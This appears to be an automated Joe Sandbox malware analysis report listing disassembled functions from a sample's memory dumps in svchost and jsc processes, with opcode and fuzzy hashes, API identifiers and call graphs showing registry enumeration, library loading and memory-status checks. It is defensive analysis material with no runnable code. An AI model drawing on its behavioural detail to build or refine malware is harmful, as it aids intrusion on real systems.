                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                            • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                                                                                            • Instruction ID: 9813c85d6a4e6b410be3fbba291da680de5116a64f4612608ae0abed409cd789
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                                                                                            • Instruction Fuzzy Hash: 56D1C073B14A8089E711CFA9D4503EC3BF2F358798F944216EE5997BADDA34D586C380
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB152980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                            • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                                                                                            • Instruction ID: 09b4fb6334474ae7ba443719dd27fb923689fdde7a1d2b8d639452366c468453
                                                                                                                                                                                            • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                                                                                            • Instruction Fuzzy Hash: A1918B73F1065485FB649FA594A07ED2FF0B758B88F944109EE4A67AADDB34C4C2C780
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB14253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileType
                                                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                                                                                            • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                                                            • Instruction ID: 4db692cd766821b03bbcf4e6706c42bc2717f3e951b7059b7027aecbf0cfbe0a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D71F436A2078185E7249FE6A8603EA6F90F39D784FD40126FD0953BADDE34C6C5CB40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB409E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2466799822.00000142DB400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000142DB400000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db400000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CallTranslator
                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                            • API String ID: 3163161869-2084237596
                                                                                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                                                            • Instruction ID: 3199ed8390d0fa05e3664a4108cc5041b4d27e05b68a5a1648824dc15d2af2f6
                                                                                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D619D73A01B848AEB20DFA9D4603DD7BA0F398B88F644215FF4917BA9DB38D595C740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB142330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileType
                                                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                                                                                            • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                                                            • Instruction ID: 936b627bceefdb86dea39e6e9df08739a518a2253896ac0f6be0d4a5c16ce657
                                                                                                                                                                                            • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3951C232E1478181E6749EEAA4783FA6F91F38D780FD90125EE5903BADDA39C5C58780
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB1526F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                            • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                                                            • Instruction ID: 35393f13426a4f58b8523b06a49a22c73a28843ca0030a4ac0d8de0d937783e7
                                                                                                                                                                                            • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                                                            • Instruction Fuzzy Hash: D4417173B15A8086DB20DFA5E8543EA6BA4F798794F904121EE4D877A8DB7CC581CB80
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB1494A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                            • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                                                                                            • Instruction ID: 357e4fcac8ea96f4a3968a8ff7f86569f76177633de38bff44335b102adc1408
                                                                                                                                                                                            • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                                                                                            • Instruction Fuzzy Hash: E4113A32614B8082EB618F15F454399BBE5FB8CB94F984221EE8C4BB68DF3CC591CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB407356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2466799822.00000142DB400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000142DB400000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db400000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __std_exception_copy
                                                                                                                                                                                            • String ID: ierarchy Descriptor'$riptor at (
                                                                                                                                                                                            • API String ID: 592178966-758928094
                                                                                                                                                                                            • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                                                                                            • Instruction ID: ca92519098e85e995cf8f6ea312fec8f36c331f3a656a6c5e89f7cec0a801938
                                                                                                                                                                                            • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                                                                                            • Instruction Fuzzy Hash: 10E08671E50B4490DF01CF61E8602D877A0DB58B64B989122EA5C1B325FA38D1E9C301
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB4073B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2466799822.00000142DB400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000142DB400000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db400000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __std_exception_copy
                                                                                                                                                                                            • String ID: Locator'$riptor at (
                                                                                                                                                                                            • API String ID: 592178966-4215709766
                                                                                                                                                                                            • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                                                                                            • Instruction ID: 02903772939c2eb1c07ba765b84732811d757d336c791229eeed81aec43274fb
                                                                                                                                                                                            • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3CE08671E50B4880DF01CF61E8601D87760E758B54BC89122EA4C17325EA38D1E5C301
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB141BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 756756679-0
                                                                                                                                                                                            • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                                                                                            • Instruction ID: 5a5c01ce78565fd74c696db36f371b5237a3d4e461e7a259cc3e1a998e11e402
                                                                                                                                                                                            • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 41118F35A01B8481EA44DBA7A8543AA7BE1FB8DFD0F984024EE4D47779DF38C492C340
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB141268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$AllocProcess
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1617791916-0
                                                                                                                                                                                            • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                            • Instruction ID: 45712faeb99f7f987e3ec587f2db52db37eb65bac13ed058757f2fc622f80c19
                                                                                                                                                                                            • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                            • Instruction Fuzzy Hash: CDE03935A01604C6EB448BA2D8683AA3AE1EB8DB06F848024C90907765DF7DC8D9C790
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:16.1%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                            Total number of Nodes:36
                                                                                                                                                                                            Total number of Limit Nodes:4
                                                                                                                                                                                            execution_graph 12083 1668450 12084 1668454 12083->12084 12087 166872f 12084->12087 12092 1668848 12084->12092 12089 166876c 12087->12089 12088 1668846 12088->12084 12089->12088 12097 16688c0 12089->12097 12101 16688d0 12089->12101 12093 166881f 12092->12093 12094 1668846 12093->12094 12095 16688c0 GlobalMemoryStatusEx 12093->12095 12096 16688d0 GlobalMemoryStatusEx 12093->12096 12094->12084 12095->12093 12096->12093 12098 16688f5 12097->12098 12105 1669127 12098->12105 12099 16689d5 12102 16688f5 12101->12102 12104 1669127 GlobalMemoryStatusEx 12102->12104 12103 16689d5 12104->12103 12106 166914d 12105->12106 12109 1666800 12106->12109 12108 16693e7 12108->12099 12110 1666824 12109->12110 12113 16669ef 12110->12113 12111 1666886 12111->12108 12117 1666a36 12113->12117 12122 1666a38 12113->12122 12114 1666a0e 12114->12111 12118 1666a45 12117->12118 12119 1666a6d 12117->12119 12118->12114 12127 1666118 12119->12127 12123 1666a45 12122->12123 12124 1666a6d 12122->12124 12123->12114 12125 1666118 GlobalMemoryStatusEx 12124->12125 12126 1666a8a 12125->12126 12126->12114 12128 1666b10 GlobalMemoryStatusEx 12127->12128 12130 1666a8a 12128->12130 12130->12114

                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                            Function 01666AC8 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1246 1666ac8-1666af1 1249 1666af7-1666b4e 1246->1249 1250 1666af3-1666af6 1246->1250 1252 1666b56-1666b84 GlobalMemoryStatusEx 1249->1252 1253 1666b86-1666b8c 1252->1253 1254 1666b8d-1666bb5 1252->1254 1253->1254
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,01666A8A), ref: 01666B77
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.3904383587.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_1660000_jsc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1890195054-0
                                                                                                                                                                                            • Opcode ID: ffe09b94571922d4fb67595802d4c5debbde7085e21139efcf3b8433ce4fe9b7
                                                                                                                                                                                            • Instruction ID: 5b5522f146daf09fcf8fd8197b22c58e7749810a06140429473b4046cff65c43
                                                                                                                                                                                            • Opcode Fuzzy Hash: ffe09b94571922d4fb67595802d4c5debbde7085e21139efcf3b8433ce4fe9b7
                                                                                                                                                                                            • Instruction Fuzzy Hash: F021CCB0C0438A8FDB20DFAAD4007DEFBF4AF49320F05846AC844A3251D7389946CF91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 01666118 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1257 1666118-1666b84 GlobalMemoryStatusEx 1260 1666b86-1666b8c 1257->1260 1261 1666b8d-1666bb5 1257->1261 1260->1261
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,01666A8A), ref: 01666B77
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.3904383587.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_1660000_jsc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1890195054-0
                                                                                                                                                                                            • Opcode ID: 4600c3a346b154e78d7dee4018d28d3459fc28d2e3c4afabd84c069b93bf1efa
                                                                                                                                                                                            • Instruction ID: 2ae7d34a4e010bd0078cae02dabfcf845f10c0d7a9bb6e1c97748e1401908901
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4600c3a346b154e78d7dee4018d28d3459fc28d2e3c4afabd84c069b93bf1efa
                                                                                                                                                                                            • Instruction Fuzzy Hash: BC1117B1C00659DBDB10DF9AD844BDEFBF4EB48320F14812AD914B7240D778A951CFA5
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0147D400 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.3903034997.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_147d000_jsc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 2d74b46f201e074c8415d3897bf967f1a889ea8ea56b1460d5b35ec511267fe3
                                                                                                                                                                                            • Instruction ID: 93d71d082f710ed327ab60bf44bb446f544991ede8e5896ca45f3546e2c41f20
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d74b46f201e074c8415d3897bf967f1a889ea8ea56b1460d5b35ec511267fe3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 52210671914204DFDB15DF54D9C4B97BF65FF98320F20C17AD9090A366C336E456CAA1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0147D4EC Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.3903034997.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_147d000_jsc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 6a2b1f780e7c5c5d04d10a2a1c98c11a35e2a773673d2e9e09b73f3b8733f69e
                                                                                                                                                                                            • Instruction ID: f97354914ca39815efb5777050fe3384c6f95bf3f4829226aabe5d7151af715f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a2b1f780e7c5c5d04d10a2a1c98c11a35e2a773673d2e9e09b73f3b8733f69e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 552103B1A14200DFDB15DF94D9C0B67BF65FF88328F20856AE8090B366C336D456CAA2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0147D4E7 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.3903034997.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_147d000_jsc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                                                                                                                            • Instruction ID: 3779bad64d71f05f0d8e98b5f5bf2eaac6db4477d020acf2e0f107b75c8570a0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0411AF76904240CFCB16CF54D5C4B56BF62FF88324F24C5AAD8490B266C336D45ACBA1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0147D3FB Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.3903034997.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_147d000_jsc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                                                                                                                            • Instruction ID: db2e2b038e26cd802238888e2eb273363528bcd2da400a92fd9af96cec99a972
                                                                                                                                                                                            • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2711DF76904280DFCB16CF54D9C4B96BF62FF84320F24C1AAD9090B267C33AE456CBA1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:0.8%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                            Total number of Nodes:66
                                                                                                                                                                                            Total number of Limit Nodes:3
                                                                                                                                                                                            execution_graph 15191 1f28a01273c 15193 1f28a01276a 15191->15193 15192 1f28a012858 LoadLibraryA 15192->15193 15193->15192 15194 1f28a0128d4 15193->15194 15195 1f28a041abc 15200 1f28a041628 GetProcessHeap HeapAlloc 15195->15200 15197 1f28a041ad2 Sleep SleepEx 15198 1f28a041acb 15197->15198 15198->15197 15199 1f28a041598 StrCmpIW StrCmpW 15198->15199 15199->15198 15244 1f28a041268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15200->15244 15202 1f28a041650 15245 1f28a041268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15202->15245 15204 1f28a041661 15246 1f28a041268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15204->15246 15206 1f28a04166a 15247 1f28a041268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15206->15247 15208 1f28a041673 15209 1f28a04168e RegOpenKeyExW 15208->15209 15210 1f28a0418a6 15209->15210 15211 1f28a0416c0 RegOpenKeyExW 15209->15211 15210->15198 15212 1f28a0416e9 15211->15212 15213 1f28a0416ff RegOpenKeyExW 15211->15213 15248 1f28a0412bc RegQueryInfoKeyW 15212->15248 15215 1f28a041723 15213->15215 15216 1f28a04173a RegOpenKeyExW 15213->15216 15257 1f28a04104c RegQueryInfoKeyW 15215->15257 15219 1f28a041775 RegOpenKeyExW 15216->15219 15220 1f28a04175e 15216->15220 15223 1f28a041799 15219->15223 15224 1f28a0417b0 RegOpenKeyExW 15219->15224 15222 1f28a0412bc 16 API calls 15220->15222 15228 1f28a04176b RegCloseKey 15222->15228 15225 1f28a0412bc 16 API calls 15223->15225 15226 1f28a0417d4 15224->15226 15227 1f28a0417eb RegOpenKeyExW 15224->15227 15229 1f28a0417a6 RegCloseKey 15225->15229 15230 1f28a0412bc 16 API calls 15226->15230 15231 1f28a041826 RegOpenKeyExW 15227->15231 15232 1f28a04180f 15227->15232 15228->15219 15229->15224 15233 1f28a0417e1 RegCloseKey 15230->15233 15235 1f28a041861 RegOpenKeyExW 15231->15235 15236 1f28a04184a 15231->15236 15234 1f28a04104c 6 API calls 15232->15234 15233->15227 15237 1f28a04181c RegCloseKey 15234->15237 15239 1f28a041885 15235->15239 15240 1f28a04189c RegCloseKey 15235->15240 15238 1f28a04104c 6 API calls 15236->15238 15237->15231 15242 1f28a041857 RegCloseKey 15238->15242 15241 1f28a04104c 6 API calls 15239->15241 15240->15210 15243 1f28a041892 RegCloseKey 15241->15243 15242->15235 15243->15240 15244->15202 15245->15204 15246->15206 15247->15208 15249 1f28a041327 GetProcessHeap HeapAlloc 15248->15249 15250 1f28a04148a RegCloseKey 15248->15250 15251 1f28a041476 GetProcessHeap HeapFree 15249->15251 15252 1f28a041352 RegEnumValueW 15249->15252 15250->15213 15251->15250 15253 1f28a0413a5 15252->15253 15253->15251 15253->15252 15255 1f28a0413d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15253->15255 15256 1f28a04141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 15253->15256 15262 1f28a04152c 15253->15262 15255->15256 15256->15253 15258 1f28a0411b5 RegCloseKey 15257->15258 15260 1f28a0410bf 15257->15260 15258->15216 15259 1f28a0410cf RegEnumValueW 15259->15260 15260->15258 15260->15259 15261 1f28a04114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15260->15261 15261->15260 15263 1f28a04157c 15262->15263 15266 1f28a041546 15262->15266 15263->15253 15264 1f28a041565 StrCmpW 15264->15266 15265 1f28a04155d StrCmpIW 15265->15266 15266->15263 15266->15264 15266->15265

                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                            Function 000001F28A04104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                                                            • String ID: d
                                                                                                                                                                                            • API String ID: 3743429067-2564639436
